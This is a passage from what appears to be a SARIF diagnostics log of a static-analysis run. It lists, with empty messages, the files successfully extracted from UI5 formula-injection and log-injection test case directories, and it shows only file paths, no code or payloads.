{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":271}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":272}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":273}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":274}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":275}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":276}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":279}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":281}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":282}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":283}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":284}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":286}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":287}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":288}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":289}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":291}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":292}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":293}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":295}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":296}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":298}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":299}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":300}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":301}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":302}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":303}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":304}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":305}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":306}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":307}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":308}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package-lock.json","uriBaseId":"%SRCROOT%","index":309}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/ui5.yaml","uriBaseId":"%SRCROOT%","index":310}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package.json","uriBaseId":"%SRCROOT%","index":311}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.html","uriBaseId":"%SRCROOT%","index":313}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":315}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package-lock.json","uriBaseId":"%SRCROOT%","index":318}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package.json","uriBaseId":"%SRCROOT%","index":319}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/ui5.yaml","uriBaseId":"%SRCROOT%","index":320}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.html","uriBaseId":"%SRCROOT%","index":322}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":324}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package-lock.json","uriBaseId":"%SRCROOT%","index":326}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package.json","uriBaseId":"%SRCROOT%","index":327}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/ui5.yaml","uriBaseId":"%SRCROOT%","index":328}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.html","uriBaseId":"%SRCROOT%","index":330}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":331}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package-lock.json","uriBaseId":"%SRCROOT%","index":334}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":335}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/ui5.yaml","uriBaseId":"%SRCROOT%","index":336}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":337}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.html","uriBaseId":"%SRCROOT%","index":338}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":339}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package.json","uriBaseId":"%SRCROOT%","index":340}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":341}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":342}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":343}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json","uriBaseId":"%SRCROOT%","index":344}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json","uriBaseId":"%SRCROOT%","index":345}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml","uriBaseId":"%SRCROOT%","index":346}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri